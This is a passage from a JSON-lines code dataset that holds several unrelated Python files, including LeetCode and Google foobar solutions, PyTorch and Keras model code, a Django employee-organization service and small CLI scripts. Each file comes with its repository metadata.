FORCE\n# https://leetcode.com/problems/find-winner-on-a-tic-tac-toe-game/solution/\nclass Solution:\n def tictactoe(self, moves: List[List[int]]) -> str:\n\n # Initialize the board, n = 3 in this problem.\n n = 3\n board = [[0] * n for _ in range(n)]\n \n # Check if any of 4 winning conditions to see if the current player has won.\n def checkRow(row, player_id):\n for col in range(n):\n if board[row][col] != player_id:\n return False\n return True\n \n def checkCol(col, player_id):\n for row in range(n):\n if board[row][col] != player_id:\n return False\n return True\n \n def checkDiagonal(player_id):\n for row in range(n):\n if board[row][row] != player_id:\n return False\n return True\n \n def checkAntiDiagonal(player_id):\n for row in range(n):\n if board[row][n - 1 - row] != player_id:\n return False\n return True\n \n # Start with player_1.\n player = 1\n\n for move in moves:\n row, col = move\n board[row][col] = player\n \n # If any of the winning conditions is met, return the current player's id.\n if checkRow(row, player) or checkCol(col, player) or \\\n (row == col and checkDiagonal(player)) or \\\n (row + col == n - 1 and checkAntiDiagonal(player)):\n return 'A' if player == 1 else 'B'\n \n # If no one wins so far, change to the other player alternatively. \n # That is from 1 to -1, from -1 to 1.\n player *= -1\n \n # If all moves are completed and there is still no result, we shall check if\n # the grid is full or not. If so, the game ends with draw, otherwise pending. \n return \"Draw\" if len(moves) == n * n else \"Pending\"\n\n# V1'\n# IDEA : RECORD EACH MOVE\n# https://leetcode.com/problems/find-winner-on-a-tic-tac-toe-game/solution/\nclass Solution:\n def tictactoe(self, moves: List[List[int]]) -> str:\n\n # n stands for the size of the board, n = 3 for the current game.\n n = 3\n\n # use rows and cols to record the value on each row and each column.\n # diag1 and diag2 to record value on diagonal or anti-diagonal.\n rows, cols = [0] * n, [0] * n\n diag = anti_diag = 0\n \n # Two players having value of 1 and -1, player_1 with value = 1 places first.\n player = 1\n \n for row, col in moves:\n \n # Update the row value and column value.\n rows[row] += player\n cols[col] += player\n \n # If this move is placed on diagonal or anti-diagonal, \n # we shall update the relative value as well.\n if row == col: \n diag += player\n if row + col == n - 1:\n anti_diag += player\n \n # check if this move meets any of the winning conditions.\n if any(abs(line) == n for line in (rows[row], cols[col], diag, anti_diag)):\n return \"A\" if player == 1 else \"B\"\n \n # If no one wins so far, change to the other player alternatively. \n # That is from 1 to -1, from -1 to 1.\n player *= -1\n \n # If all moves are completed and there is still no result, we shall check if \n # the grid is full or not. If so, the game ends with draw, otherwise pending.\n return \"Draw\" if len(moves) == n * n else \"Pending\" \n\n# V2","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Array/find-winner-on-a-tic-tac-toe-game.py","file_name":"find-winner-on-a-tic-tac-toe-game.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"20814904041","text":"import os\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom PyInquirer import prompt\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import ImageFolder\n\nfrom commands import Command\nfrom transforms import rotation_net_regulation_transformer\nfrom utils import AverageMeter, random_input, rotation_net_accuracy\n\n\nclass ValidateCommand(Command):\n name = \"Validating\"\n\n def command(self, context: Dict):\n batch_size_menu = {\n \"type\": \"input\",\n \"name\": \"batch_size\",\n \"message\": \"Batch Size:\",\n \"default\": \"240\",\n }\n batch_size = int(prompt(batch_size_menu)[\"batch_size\"])\n\n viewpoint_menu = {\n \"type\": \"input\",\n \"name\": \"viewpoint_num\",\n \"message\": \"Viewpoint num:\",\n \"default\": \"80\",\n }\n viewpoint_num = int(prompt(viewpoint_menu)[\"viewpoint_num\"])\n\n self.validate(batch_size, viewpoint_num)\n\n @classmethod\n def validate(cls, batch_size, viewpoint_num):\n if not os.path.exists(\"rotation_net.pth\"):\n print(\"模型未找到\")\n\n pth = torch.load(\"rotation_net.pth\")\n model = pth[\"model\"]\n epoch = pth[\"epoch\"]\n\n test_dataset = DataLoader(\n ImageFolder(\n \"data/ModelNet40v2/modelnet/test\",\n transform=rotation_net_regulation_transformer\n ),\n pin_memory=True,\n batch_size=batch_size,\n shuffle=False,\n )\n random_input(test_dataset, viewpoint_num)\n matrix = np.load(\"matrix2.npy\")\n\n print(f\"模型已经训练: {epoch}次\")\n model.eval()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n with torch.no_grad():\n\n for i, (samples, targets) in enumerate(test_dataset):\n targets = targets.cuda()\n # compute output\n output = model(samples.cuda())\n # log_softmax and reshape output\n num_classes = int(output.size(1) / viewpoint_num) - 1\n output = output.view(-1, num_classes + 1)\n output = torch.log_softmax(output, dim=1)\n output = output[:, :-1] - torch.t(output[:, -1].repeat(1, output.shape[1] - 1).view(output.shape[1] - 1, -1))\n output = output.view(-1, viewpoint_num *\n viewpoint_num, num_classes)\n\n # measure accuracy and record loss\n pred_1, pred_5 = rotation_net_accuracy(output.data,\n targets,\n matrix=matrix,\n viewpoint_num=viewpoint_num,\n top_k=(1, 5))\n top1.update(pred_1.item(), samples.shape[0] / viewpoint_num)\n top5.update(pred_5.item(), samples.shape[0] / viewpoint_num)\n\n print(f\"Top1 Accuracy: {top1.avg}\")\n print(f\"Top5 Accuracy: {top5.avg}\")\n","repo_name":"lingfromSh/rotation-net-implement-pytorch","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71699683043","text":"from proje import *\n\nprint(\"\"\"Kütüphane programına hoşgeldiniz...\n1-Veri ekleme\n\n2-Veri silme\n\n4-Verileri öğrenme\n\n5-Veri sorgulama\n\n6-Baskı sayısını yükseltme\n\nÇıkmak için 'q'ya basınız...\n\"\"\")\nkutuphane = kutuphane()\nwhile True:\n islem = input(\"Yapmak istediğiniz işlemi seçiniz:\")\n if islem == \"q\" or islem == \"Q\":\n print(\"Program kapatılıyor...\")\n kutuphane.baglantikes()\n time.sleep(2)\n break\n elif not islem:\n print(\"Lütfen boş bırakmayınız...\")\n elif islem == \"1\":\n isim = input(\"Kitabın ismini giriniz:\")\n yazar = input(\"Yazarın ismini giriniz:\")\n tur = input(\"Tür'ü giriniz:\")\n yayinevi = input(\"Yayınevi ismini giriniz:\")\n baski = int(input(\"Baskı sayısını giriniz:\"))\n if not isim or not yazar or not tur or not yayinevi or not baski:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veriler ekleniyor...\")\n time.sleep(2)\n kutuphane.veriekleme(isim, yazar, tur, yayinevi, baski)\n print(\"Veriler başarıyla eklendi.\")\n elif islem == \"2\":\n dataone0 = input(\"Silinecek kitabın ismi:\")\n if not dataone0:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veri siliniyor...\")\n time.sleep(2)\n kutuphane.verisilme(dataone0)\n print(\"Veri silindi\")\n elif islem == \"4\":\n print(\"Veriler yazdırılıyor...\")\n time.sleep(3)\n kutuphane.bilgilerigoster()\n elif islem == \"5\":\n dataone2 = input(\"Sorgulanacak kitap ismi:\")\n if not dataone2:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Veriler yazdırılıyor\")\n time.sleep(1.5)\n kutuphane.verisorgulama(dataone2)\n elif islem == \"6\":\n dataone3 = input(\"Baskı sayısını yükseltmek istediğiniz kitabı giriniz:\")\n if not dataone3:\n print(\"Lütfen boş bırakmayınız...\")\n else:\n print(\"Baskı yükseltiliyor...\")\n time.sleep(1)\n kutuphane.baskiyukselt(dataone3)\n print(\"Baskı yükseltildi...\")\n else:\n print(\"Hatalı tuşlama lütfen tekrar deneyiniz\")","repo_name":"angryfoxx/python_egzersizleri","sub_path":"sqlite veritabanı/proje_deneme.py","file_name":"proje_deneme.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"14466226905","text":"from abc import ABCMeta, abstractmethod\nimport numpy as np\n\nclass BaseSubspace(metaclass=ABCMeta):\n def __init__(self, measurements=None, A=None, k=None, rank=None, pks=[], name=''):\n # Check A\n if A is None:\n self.__A = np.asarray(a=1, dtype=measurements.dtype)\n else:\n # Check the type and number of dimensions of A\n if not (type(A) is np.ndarray):\n raise ValueError('A must be an array')\n else:\n if not (len(A.shape) == 2):\n raise ValueError(\"Dimensions of A must be 2\")\n self.__A = np.asarray(A)\n # Shape of A\n m, n = A.shape\n self.__At = np.transpose(np.conjugate(self.__A))\n\n # Check measurements\n if measurements is None:\n self._measurements = np.asarray(1)\n else:\n if not (type(measurements) is np.ndarray):\n raise ValueError('measurements must be an array')\n\n # Check the dimensions of the measurements\n if not (measurements.shape[0] == A.shape[0]):\n raise ValueError(\"The dimension of y is not consistent with the dimensions of A\")\n\n self.__measurements = np.asarray(a=measurements, dtype=measurements.dtype)\n\n # Control of the value of k\n if k is None:\n print('WARNING: Unknown sparsity considered. Some of the algorithms may not be applicable.')\n self.__k = k\n else:\n if k > self.A.shape[1]:\n raise ValueError(\"k cannot be larger than the number of atoms\")\n else:\n self.__k = k\n\n # Assign the given rank\n if rank is not None:\n if rank < 0:\n raise ValueError('rank must be positive.')\n self._rank = rank\n\n # Check the partially known support\n if not(type(pks) is list):\n self._pks = pks.tolist()\n else:\n self._pks = pks\n\n # Create the solution\n self.sol = np.zeros(shape=(n, measurements.shape[1]), dtype=measurements.dtype)\n self.support_sol = []\n\n # Assign the name\n self.__name = name\n\n @abstractmethod\n def solve(self, threshold):\n pass\n\n @property\n def A(self):\n return self.__A\n\n @property\n def At(self):\n return self.__At\n\n @property\n def measurements(self):\n return self.__measurements\n\n @property\n def k(self):\n return self.__k\n\n @property\n def name(self):\n return self.__name\n\n @property\n def rank(self):\n return self._rank\n\n @property\n def pks(self):\n return self._pks\n\n def estimate_measurement_rank(self):\n return np.linalg.matrix_rank(M=self.measurements, tol=None, hermitian=False)\n\n def compute_covariance_matrix(self):\n return np.matmul(self.measurements, np.conjugate(self.measurements.T)) / self.measurements.shape[1]\n\n def estimate_signal_subspace(self, threshold=0.01):\n # Compute the covariance matrix\n gamma = self.compute_covariance_matrix()\n\n # EVD\n eig_vals, eig_vecs = np.linalg.eigh(gamma, UPLO='L')\n eig_vals = eig_vals[::-1]\n eig_vecs = eig_vecs[:, ::-1]\n\n # If the rank is not known - Estimate the rank\n if self._rank is None:\n # Shape of the measurements\n m = self.measurements.shape[0]\n\n # Estimate the dimension of the signal subspace\n eig_diff = np.abs(np.diff(eig_vals))\n ind = np.where(eig_diff >= threshold*eig_vals[0])[0][-1]\n self._rank = m - ind\n\n # r dominant eigenvectors of the covariance matrix\n U = eig_vecs[:,:self._rank]\n\n # Projection matrix\n P = np.matmul(U, np.conjugate(U.T))\n\n return P\n\n def estimate_noise_subspace(self, threshold=0.1):\n # Compute the covariance matrix\n gamma = self.compute_covariance_matrix()\n\n # EVD\n eig_vals, eig_vecs = np.linalg.eigh(gamma, UPLO='L')\n eig_vals = eig_vals[::-1]\n eig_vecs = eig_vecs[:, ::-1]\n\n # If the rank is not known - Estimate the rank\n if self._rank is None:\n # Shape of the measurements\n m = self.measurements.shape[0]\n\n # Estimate the dimension of the signal subspace\n eig_diff = np.diff(eig_vals)\n ind = np.where(eig_diff >= threshold*eig_vals[0])[0]\n self._rank = m - ind\n\n # n-r lowest eigenvectors of the covariance matrix\n U = eig_vecs[:,self.rank:]\n\n # Projection matrix\n P = np.matmul(U, np.conjugate(U.T))\n\n return P","repo_name":"AdriBesson/joint_sparse_algorithms","sub_path":"subspacemethods/basesubspace.py","file_name":"basesubspace.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"5302828049","text":"import settings\nimport tensorflow as tf\n\nfrom argparser import args\nfrom tensorflow import keras as K\n\ndef dice_coef(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n prediction = tf.round(prediction) # Round to 0 or 1\n\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\ndef soft_dice_coef(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n intersection = tf.reduce_sum(target * prediction, axis=axis)\n union = tf.reduce_sum(target + prediction, axis=axis)\n numerator = tf.constant(2.) * intersection + smooth\n denominator = union + smooth\n coef = numerator / denominator\n\n return tf.reduce_mean(coef)\n\ndef dice_loss(target, prediction, axis=(1, 2, 3), smooth=0.0001):\n intersection = tf.reduce_sum(prediction * target, axis=axis)\n p = tf.reduce_sum(prediction, axis=axis)\n t = tf.reduce_sum(target, axis=axis)\n numerator = tf.reduce_mean(intersection + smooth)\n denominator = tf.reduce_mean(t + p + smooth)\n dice_loss = -tf.math.log(2.*numerator) + tf.math.log(denominator)\n\n return dice_loss\n\ndef unet_3d(input_dim, filters=settings.filters,\n no_output_classes=args.output_classes,\n use_upsampling=settings.use_upsampling,\n concat_axis=-1, model_name=settings.net2_seg_modelname):\n\n def ConvolutionBlock(x, name, filters, params):\n x = K.layers.Conv3D(filters=filters, **params, name=name+\"_conv0\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn0\")(x)\n x = K.layers.Activation(\"relu\", name=name+\"_relu0\")(x)\n\n x = K.layers.Conv3D(filters=filters, **params, name=name+\"_conv1\")(x)\n x = K.layers.BatchNormalization(name=name+\"_bn1\")(x)\n x = K.layers.Activation(\"relu\", name=name)(x)\n\n return x\n \n inputs = K.layers.Input(shape=input_dim, name=\"MRImages\")\n \n params = dict(kernel_size=(3, 3, 3), activation=None,\n padding=\"same\", kernel_initializer=\"he_uniform\")\n\n # Transposed convolution parameters\n params_trans = dict(kernel_size=(2, 2, 2), strides=(2, 2, 2),\n padding=\"same\", kernel_initializer=\"he_uniform\")\n\n # BEGIN - Encoding path\n encodeA = ConvolutionBlock(inputs, \"encodeA\", filters, params)\n poolA = K.layers.MaxPooling3D(name=\"poolA\", pool_size=(2, 2, 2))(encodeA)\n\n encodeB = ConvolutionBlock(poolA, \"encodeB\", filters*2, params)\n poolB = K.layers.MaxPooling3D(name=\"poolB\", pool_size=(2, 2, 2))(encodeB)\n\n encodeC = ConvolutionBlock(poolB, \"encodeC\", filters*4, params)\n poolC = K.layers.MaxPooling3D(name=\"poolC\", pool_size=(2, 2, 2))(encodeC)\n\n encodeD = ConvolutionBlock(poolC, \"encodeD\", filters*8, params)\n poolD = K.layers.MaxPooling3D(name=\"poolD\", pool_size=(2, 2, 2))(encodeD)\n\n encodeE = ConvolutionBlock(poolD, \"encodeE\", filters*16, params)\n # END - Encoding path\n\n # BEGIN - Decoding path\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upE\", size=(2, 2, 2))(encodeE)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvE\", filters=filters*8,**params_trans)(encodeE)\n\n concatD = K.layers.concatenate([up, encodeD], axis=concat_axis, name=\"concatD\")\n\n decodeC = ConvolutionBlock(concatD, \"decodeC\", filters*8, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upC\", size=(2, 2, 2))(decodeC)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvC\", filters=filters*4,**params_trans)(decodeC)\n \n concatC = K.layers.concatenate([up, encodeC], axis=concat_axis, name=\"concatC\")\n\n decodeB = ConvolutionBlock(concatC, \"decodeB\", filters*4, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upB\", size=(2, 2, 2))(decodeB)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvB\", filters=filters*2, **params_trans)(decodeB)\n \n concatB = K.layers.concatenate([up, encodeB], axis=concat_axis, name=\"concatB\")\n\n decodeA = ConvolutionBlock(concatB, \"decodeA\", filters*2, params)\n\n if use_upsampling:\n up = K.layers.UpSampling3D(name=\"upA\", size=(2, 2, 2))(decodeA)\n else:\n up = K.layers.Conv3DTranspose(name=\"transconvA\", filters=filters,**params_trans)(decodeA)\n \n concatA = K.layers.concatenate([up, encodeA], axis=concat_axis, name=\"concatA\")\n\n # END - Decoding path\n\n convOut = ConvolutionBlock(concatA, \"convOut\", filters, params)\n\n prediction = K.layers.Conv3D(name=\"PredictionMask\",\n filters=no_output_classes,\n kernel_size=(1, 1, 1),\n activation=\"sigmoid\")(convOut)\n \n model = K.models.Model(inputs=[inputs], outputs=[prediction],name=model_name)\n\n return model","repo_name":"devdinie/UMAGeT","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31997981729","text":"digitos = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')\n\ndef totalGasto():\n dic = {}\n \n with open(\"gastos.txt\") as gastos:\n for linha in gastos:\n if linha.startswith(digitos) == False:\n categoria = linha.strip(\"\\n\").split(\",\")[0]\n dic[categoria] = 0\n else:\n valorInteiro = linha.strip(\"\\n\").split(\",\")[2]\n valorDecimal = linha.strip(\"\\n\").split(\",\")[3]\n valor = valorInteiro + '.' + valorDecimal\n\n dic[categoria] += float(valor)\n \n return dic\n \n\ngastosMensais = totalGasto()\n\n# Para acessar as chaves do dicionario, use: \n# for chave in dicionario\n# Já para os valores: \n# for valor in dicionario.values()\n# E para os pares:\nfor categoria, valor in gastosMensais.items(): \n print(f\"Gastos na categoria {categoria}:\", valor, \"reais\")\n\n","repo_name":"OmarMesqq/faculdade","sub_path":"puc/CTC4002/G2/exercicio_2.py","file_name":"exercicio_2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71981203681","text":"from fractions import Fraction\nimport collections\n\nloop_probability = lambda x : Fraction(1, 1-x)\n\ndef calculate_loop_states(sources, next_stage_probability, loop_states=[], calculated_loop_states=[]):\n # [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n record = calculated_loop_states\n loop_list = {}\n for source in sources:\n if not source in record:\n record.append(source)\n if source in loop_list:\n loop_list[source].update([v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]])\n else:\n loop_list[source] = [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n if not loop_list or source not in loop_list:\n # print(\"> \", loop_states, record)\n return loop_states\n else:\n loop_states.append(loop_list)\n return calculate_loop_states(loop_list[source], next_stage_probability, loop_states, record)\n\n\ndef calculate_probability_of_node(matrix, terminals):\n d={}\n count =0\n next_stage_probability={}\n for row in matrix:\n count2=0\n if count in terminals:\n d[count] = []\n current_row_denominator = sum(row)\n d[count] = []\n for element in row:\n if element != 0:\n if count in next_stage_probability:\n next_stage_probability[count].update({count2: Fraction(element, current_row_denominator)})\n else:\n next_stage_probability[count] = ({count2: Fraction(element, current_row_denominator)})\n d[count].append(count2)\n count2 +=1\n count+=1\n return next_stage_probability, d\n\n\ndef find_all_paths(nsp, start, end, path=[]):\n path = path + [start]\n if start == end:\n return [path]\n if not nsp.__contains__(start):\n return []\n paths = []\n for node in next_stage_probability[start]:\n if node not in path:\n newpaths = find_all_paths(nsp, node, end, path)\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\ndef answer(m):\n print(\"***********************\")\n from pprint import pprint\n print(\"matrix is:\")\n pprint(m)\n # global paths\n paths = []\n terminals = []\n stage_probability = {}\n for rows in range(len(m)):\n if sum(m[rows]) == 0:\n terminals.append(rows)\n stage_probability[rows] = 0\n\n next_stage_probability, d = calculate_probability_of_node(m, terminals)\n print(\"next_stage_probability: {}\".format(next_stage_probability))\n\n paths_to_terminal = {}\n for terminal in terminals:\n paths_to_terminal[terminal] = find_all_paths(next_stage_probability=next_stage_probability, start=0, end=terminal)\n print(\"paths_to_terminal: {}\".format(paths_to_terminal))\n\n # this is important stage where next_stage_probability is your tree and you need to calculate probability to reach to states in terminals which are values 0 rows in matrix\n terminal_probability = {}\n for terminal_state in paths_to_terminal:\n if paths_to_terminal[terminal_state]:\n probability_for_this_terminal = 0\n considered_loop = []\n for path in paths_to_terminal[terminal_state]:\n this_path_probability = 1\n for x in range(len(path)-1):\n source, destination = path[x], path[x+1]\n current_to_next = next_stage_probability[source][destination]\n #################################################\n # I need this valie of loop_list to be accurate #\n #################################################\n # loop_list = [v for v,k in next_stage_probability.items() if source in k and v in next_stage_probability[source]]\n loop_list = calculate_loop_states([source], next_stage_probability)\n this_path_probability = this_path_probability * current_to_next\n # loop_list = set(loop_list) - {source}\n # print(\">> \",path, (source, destination),loop_list, this_path_probability)\n print(\"path: {} \\t source: {} \\t destination: {} \\t loop_list: {} \\t this_path_probability: {} \\t\".format(path, source, destination, loop_list, this_path_probability))\n if loop_list:\n for loop_state in loop_list:\n # print((source, loop_state))\n for key_state in loop_state:\n for next_state in loop_state[key_state]:\n if not considered_loop.__contains__((key_state, next_state)) and not considered_loop.__contains__((next_state, key_state)):\n # loop_val = next_stage_probability[source][loop_state] * next_stage_probability[loop_state][source]\n if key_state in next_stage_probability and next_state in next_stage_probability:\n if next_state in next_stage_probability[key_state] and key_state in next_stage_probability[next_state]:\n loop_val = next_stage_probability[key_state][next_state] * next_stage_probability[next_state][key_state]\n this_path_probability = this_path_probability * loop_probability(loop_val)\n considered_loop.append((key_state, next_state))\n print(\"s: {} \\t d: {} \\t loop_val: {} \\t this_path_probability: {} \\t break_val: {}\".format(key_state, next_state, loop_val, this_path_probability, loop_probability(loop_val)))\n print(this_path_probability)\n probability_for_this_terminal = probability_for_this_terminal + this_path_probability\n terminal_probability[terminal_state] = probability_for_this_terminal\n else:\n terminal_probability[terminal_state] = Fraction(0)\n print(terminal_probability)\n max_denominator = max([v.denominator for k,v in terminal_probability.items()])\n\n final_state_probability = []\n for terminal in terminal_probability:\n current_denominator = terminal_probability[terminal].denominator\n if not current_denominator == max_denominator:\n multiplier = max_denominator / current_denominator\n # print(multiplier)\n else:\n multiplier = 1\n final_state_probability.append(int(terminal_probability[terminal].numerator * multiplier))\n # print(\"terminal {} : {} --> {}\".format(terminal, stage_probability[terminal], int(terminal.numerator * multiplier)))\n final_state_probability.append(max_denominator)\n return final_state_probability\n\n\n# test cases below\n# print(answer([[0, 2, 1, 0, 0], [0, 0, 0, 3, 4], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]))\nprint(answer([[0, 7, 0, 5], [2, 0, 3, 0], [2, 5, 0, 0], [0, 0, 0, 0]]))\n# print(answer([[0, 1, 0, 0, 0, 1], [4, 0, 0, 3, 2, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 1, 0, 0, 0], [0, 0, 0, 7, 0, 0], [0, 0, 0, 2, 0, 1], [0, 0, 0, 0, 5, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 2, 0, 0, 0], [0, 0, 0, 1, 0, 1], [0, 0, 0, 7, 0, 0], [0, 0, 5, 0, 4, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 3, 2, 0, 0, 0], [0, 0, 0, 1, 0, 1], [0, 0, 0, 7, 0, 0], [0, 0, 0, 0, 4, 5], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n# print(answer([[0, 1, 0, 0, 0, 1], [4, 0, 2, 3, 2, 1], [9, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]))\n","repo_name":"gahan9/mystuff","sub_path":"foobar/level_3-96hrs/2/solution0.py","file_name":"solution0.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15440378060","text":"from datetime import datetime\nfrom StringIO import StringIO\nfrom django.contrib.auth import get_user_model\n\nfrom app.models.employee_profile import EmployeeProfile\nfrom app.dtos.operation_result import OperationResult\nfrom app.dtos.employee_organization.employee_organization_setup_data \\\n import EmployeeOrganizationSetupData\nfrom app.serializers.employee_organization.employee_organization_setup_data_serializer \\\n import EmployeeOrganizationSetupDataSerializer, EmployeeOrganizationSetupDataPostSerializer\n\nUser = get_user_model()\n\n\nclass EmployeeOrganizationService(object):\n FIELD_FIRST_NAME = 'first_name'\n FIELD_LAST_NAME = 'last_name'\n FIELD_MANAGER_FIRST_NAME = 'manager_first_name'\n FIELD_MANAGER_LAST_NAME = 'manager_last_name'\n FIELD_RECORD_END = 'record-end'\n\n REQUIRED_RAW_DATA_FIELDS = [\n FIELD_FIRST_NAME,\n FIELD_LAST_NAME,\n FIELD_MANAGER_FIRST_NAME,\n FIELD_MANAGER_LAST_NAME,\n FIELD_RECORD_END\n ]\n\n def parse_batch_employee_organization_import_raw_data(self, batch_import_raw_data):\n result = OperationResult(batch_import_raw_data)\n parsed_org_data_list = []\n\n # check all lines for number of fields\n # if found bad ones, send the main wrapper back without\n # construting the individual ones\n for line in batch_import_raw_data.raw_data.split('\\n'):\n if (not line.strip()):\n continue\n\n tokens = line.split('\\t')\n\n if (len(tokens) != len(self.REQUIRED_RAW_DATA_FIELDS)):\n result.append_issue(\n 'The line [%s] fails to parse properly. Reason: Do not have enough number of fields' % line\n )\n else:\n\n # parse the fields into domain object and \n # construct the DTO needed\n org_data = {\n 'company_id': batch_import_raw_data.company_id,\n 'employee_first_name': self._get_field_value(tokens, self.FIELD_FIRST_NAME),\n 'employee_last_name': self._get_field_value(tokens, self.FIELD_LAST_NAME),\n 'manager_first_name': self._get_field_value(tokens, self.FIELD_MANAGER_FIRST_NAME),\n 'manager_last_name': self._get_field_value(tokens, self.FIELD_MANAGER_LAST_NAME)\n }\n\n # Parse the line into objects\n # Utilize serializers to perform all the details\n serializer = EmployeeOrganizationSetupDataPostSerializer(data=org_data)\n\n if (not serializer.is_valid()):\n result.append_issue(\n 'The line [%s] fails to parse properly. Reasons:[%s]' % (line, serializer.errors)\n )\n else:\n parsed_org_data_list.append(serializer.object)\n\n # Do batch validation,\n # - Collect batch level issues into the result\n # - include the list of validated account data as output\n batch_validation_result = self.batch_validate_employee_organization_setup_data(parsed_org_data_list)\n batch_validation_result.copy_issues_to(result)\n result.set_output_data(batch_validation_result.output_data)\n\n return result\n\n def _get_field_value(self, field_values, field_name):\n index = self.REQUIRED_RAW_DATA_FIELDS.index(field_name)\n if (index < 0 or index >= len(field_values)):\n return None\n return field_values[index]\n\n def batch_execute_employee_organization_setup(self, organization_setup_data_list):\n result = self.batch_validate_employee_organization_setup_data(\n organization_setup_data_list)\n\n if (result.has_issue()):\n raise Exception(\n \"Encountered validation issues while executing batch employee organization setup!\")\n\n execute_results = []\n\n # Batch process\n for data in organization_setup_data_list:\n execute_result = self.execute_employee_organization_setup(data, False)\n execute_results.append(execute_result)\n\n result.set_output_data(execute_results)\n return result\n\n def execute_employee_organization_setup(self, organization_setup_data, do_validation=True):\n result = None\n\n # Do validation first, and short circuit if failed\n if (do_validation):\n result = self.validate_employee_organization_setup_data(organization_setup_data)\n else:\n # directly construct the result, skipping validation\n result = OperationResult(organization_setup_data)\n\n # If the operation input info is not valid to begin with\n # simply short circuit and return it\n if (result.has_issue()):\n raise Exception(\n \"Encountered validation issues while executing employee organization setup!\")\n\n # get employee profile to update\n employee_profile = organization_setup_data.get_employee_profile()\n\n # get manager's profile\n manager_profile = organization_setup_data.get_manager_profile()\n\n # now do the assignment\n employee_profile.manager = manager_profile\n employee_profile.save()\n\n result.set_output_data(organization_setup_data)\n return result\n\n def batch_validate_employee_organization_setup_data(self, organization_setup_data_list):\n result = OperationResult(organization_setup_data_list)\n\n if (not organization_setup_data_list):\n result.append_issue(\n 'Did not find any employee organization setup to handle'\n )\n else:\n has_invalid = False\n validation_results = []\n\n for data in organization_setup_data_list:\n validate_result = self.validate_employee_organization_setup_data(data)\n if (validate_result.has_issue()):\n has_invalid = True \n\n validation_results.append(validate_result)\n\n if (has_invalid):\n result.append_issue(\n 'There are validation issues on some employee organization setup data.'\n )\n\n result.set_output_data(validation_results)\n\n return result\n\n def validate_employee_organization_setup_data(self, organization_setup_data):\n result = OperationResult(organization_setup_data)\n result.set_output_data(organization_setup_data)\n\n if (not organization_setup_data or\n not organization_setup_data.company_id):\n result.append_issue(\n \"Missing necessary information for employee organization setup\"\n )\n return result\n\n if (not organization_setup_data.employee_person_id):\n result.append_issue(\n \"Could not locate employee profile for the given employee\"\n )\n\n # It is a valid case where manager info is not specified, which \n # we infer as to not-setup or remove manager for the employee\n # But it is invalid that the manager info is specified but failed\n # to resolve to a valid employee profile\n if (organization_setup_data.has_manager_info_specified \n and not organization_setup_data.manager_profile_id):\n result.append_issue(\n \"Could not locate manager's employee profile based on info provided\"\n )\n\n # check the employee and manager belong to the same company\n employee_profile = organization_setup_data.get_employee_profile()\n manager_profile = organization_setup_data.get_manager_profile()\n if (employee_profile and manager_profile):\n if (employee_profile.company.id != manager_profile.company.id):\n result.append_issue(\n \"The employee and manager specified do not work in the same company\"\n )\n\n return result\n","repo_name":"smoothbenefits/BenefitMY_Python","sub_path":"app/service/employee_organization_service.py","file_name":"employee_organization_service.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30873330521","text":"#!/usr/bin/env python3\nimport sys\nimport os\nimport time\nimport mido\nimport struct\nimport array\n\nEnvelope = struct.Struct(\"iidixxxx\")\n\ndef make_instrument(channel: int, amps: \"List[float]\") -> bytes:\n\treturn b\"\\xF0\" + \\\n\t\tstruct.pack(\"B\", ((len(amps) << 